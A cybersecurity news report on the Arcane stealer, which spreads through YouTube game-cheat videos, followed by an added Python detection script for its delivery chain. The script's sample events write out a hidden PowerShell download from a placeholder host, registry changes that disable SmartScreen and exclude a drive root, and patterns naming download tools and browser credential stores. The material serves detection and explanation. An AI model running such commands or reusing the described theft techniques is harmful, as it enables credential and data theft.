
Mar 20, 2025 | Ravie Lakshmanan | Malware / Threat Analysis

Malicious actors are leveraging YouTube videos that promote game cheats to distribute a newly discovered stealer malware known as Arcane, which appears to primarily target users who speak Russian.

According to Kaspersky, the malware’s ability to collect a wide range of data is notable. The cybersecurity firm observed that Arcane can obtain account information from various VPN and gaming clients, as well as network utilities like ngrok, Playit, Cyberduck, FileZilla, and DynDNS.

The attack chain begins with links to password-protected archives posted alongside YouTube videos. When opened, these archives unpack a batch file, start.bat, which uses PowerShell to retrieve another archive.

The batch file then uses PowerShell to launch two executables embedded in the newly downloaded archive. It also disables Windows SmartScreen protections and adds exceptions to the SmartScreen filter for every drive root folder.

Of the two binaries, one is a cryptocurrency miner, and the other is a stealer known as VGS, which is a variant of the Phemedrone Stealer malware. Notably, the attacks have been found to replace VGS with Arcane as of November 2024.

Kaspersky noted that although much of Arcane’s code was borrowed from other stealers, it could not be attributed to any known malware families.

Arcane is capable of stealing login credentials, passwords, credit card data, and cookies from various Chromium- and Gecko-based browsers. Furthermore, it can harvest comprehensive system data, configuration files, settings, and account information from several apps, including:

  • VPN clients: OpenVPN, Mullvad, NordVPN, IPVanish, Surfshark, Proton, hidemy.name, PIA, CyberGhost, and ExpressVPN
  • Network clients and utilities: ngrok, Playit, Cyberduck, FileZilla, and DynDNS
  • Messaging apps: ICQ, Tox, Skype, Pidgin, Signal, Element, Discord, Telegram, Jabber, and Viber
  • Email clients: Microsoft Outlook
  • Gaming clients and services: Riot Client, Epic, Steam, Ubisoft Connect (ex-Uplay), Roblox, Battle.net, and various Minecraft clients
  • Crypto wallets: Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic, Guarda, and Coinomi

Arcane is also designed to take screenshots of the infected device, enumerate running processes, and list saved Wi-Fi networks and their passwords.

According to Kaspersky, most browsers generate unique keys for encrypting sensitive data such as logins, passwords, and cookies. Arcane retrieves these keys through the Windows Data Protection API (DPAPI), which is typical of stealers.
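Defensive detection logic for the behaviours described above (the batch-file-to-PowerShell download chain and the SmartScreen and exclusion changes from the delivery stage, plus a non-browser process reading the browser's DPAPI-protected key store as discussed here), written as an added example in Python; it is not tooling from Kaspersky or from the article. The event records, their field names, and the exact registry locations it checks are assumptions constructed for the example: the page names neither the registry keys nor the telemetry source, so the HKLM paths below are the commonly used SmartScreen and Defender-exclusion locations chosen for illustration, and the hosts and file paths are placeholders.

```python
"""Detection rules for the Arcane delivery chain described in the article.

Added example, not tooling from Kaspersky or the article. It runs three
rules over constructed, Sysmon-style event records:

  1. cmd.exe running a .bat file spawns PowerShell with a download command
  2. a registry write that turns SmartScreen off or adds an exclusion for a
     bare drive root such as C:\\
  3. a process that is not a browser reads a Chromium or Gecko credential
     store ("Local State" holds the DPAPI-protected key; "Login Data",
     "Cookies", "logins.json" and "key4.db" hold the protected secrets)

Field names ("kind", "pid", ...) and the exact registry keys are assumptions.
"""
import re

# Constructed events (not real telemetry). Paths and hosts are placeholders.
SAMPLE_EVENTS = [
    {"kind": "process", "pid": 1201, "ppid": 900,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\Downloads\cheat\start.bat"'},
    {"kind": "process", "pid": 1202, "ppid": 1201,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "Invoke-WebRequest -Uri http://example.invalid/p.zip -OutFile $env:TEMP\p.zip"'},
    {"kind": "registry", "pid": 1202,
     "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer",
     "value": "SmartScreenEnabled", "data": "Off"},
    {"kind": "registry", "pid": 1202,
     "key": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths",
     "value": "C:\\", "data": "0"},
    {"kind": "file_read", "pid": 1310,
     "image": r"C:\Users\u\AppData\Local\Temp\svc.exe",
     "path": r"C:\Users\u\AppData\Local\Google\Chrome\User Data\Local State"},
    {"kind": "file_read", "pid": 1400,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
]

# PowerShell download primitives commonly seen in loaders.
DOWNLOAD_CMDLETS = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadFile|DownloadString|\bcurl\b|\bwget\b",
    re.IGNORECASE)
# A bare drive root: "C:" or "C:\"
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "firefox.exe"}
CREDENTIAL_STORES = {"local state", "login data", "cookies", "web data", "logins.json", "key4.db"}


def _basename(path: str) -> str:
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_name, pid) tuples for every event that matches a rule."""
    processes = {e["pid"]: e for e in events if e["kind"] == "process"}
    alerts = []
    for e in events:
        if e["kind"] == "process":
            # Rule 1: PowerShell child of a cmd.exe that is running a .bat,
            # with a download primitive on its command line.
            parent = processes.get(e["ppid"])
            if (_basename(e["image"]) == "powershell.exe"
                    and parent is not None
                    and _basename(parent["image"]) == "cmd.exe"
                    and ".bat" in parent["cmdline"].lower()
                    and DOWNLOAD_CMDLETS.search(e["cmdline"])):
                alerts.append(("batch_powershell_download", e["pid"]))
        elif e["kind"] == "registry":
            # Rule 2: SmartScreen switched off, or an exclusion for a drive root.
            if e["value"] == "SmartScreenEnabled" and str(e["data"]).lower() == "off":
                alerts.append(("smartscreen_disabled", e["pid"]))
            elif "exclusions" in e["key"].lower() and DRIVE_ROOT.match(e["value"]):
                alerts.append(("drive_root_exclusion", e["pid"]))
        elif e["kind"] == "file_read":
            # Rule 3: something other than the browser touches its key/secret store.
            if (_basename(e["image"]) not in BROWSER_IMAGES
                    and _basename(e["path"]) in CREDENTIAL_STORES):
                alerts.append(("credential_store_read", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 3 is the one that catches the DPAPI step regardless of which stealer family is involved: the browser itself legitimately reads "Login Data", so the rule keys on the reading process rather than on the file, which is why the chrome.exe event in the sample produces no alert while the executable in the Temp directory does. In production the browser allow-list would be derived from signed image paths rather than file names.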